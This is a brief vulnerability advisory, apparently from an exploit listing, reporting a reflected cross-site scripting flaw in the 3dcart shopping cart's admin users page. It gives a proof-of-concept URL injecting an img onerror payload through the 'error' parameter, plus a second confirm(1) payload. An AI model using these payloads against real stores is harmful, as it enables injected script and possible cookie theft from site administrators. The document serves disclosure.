# Affected software: 3d cart
# Type of vulnerability: xss
# URL: http://3dcart.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: Hosted Shopping Cart Software to Build an Online Store
# Proof of concept
/admin/users_view.asp?error=%3Cimg/src=%22x%3E%22onerror=
alert%28document.cookies%29%3E
vulnerable parameter = "error"
payload "><img src=d onerror=confirm(1);>
--
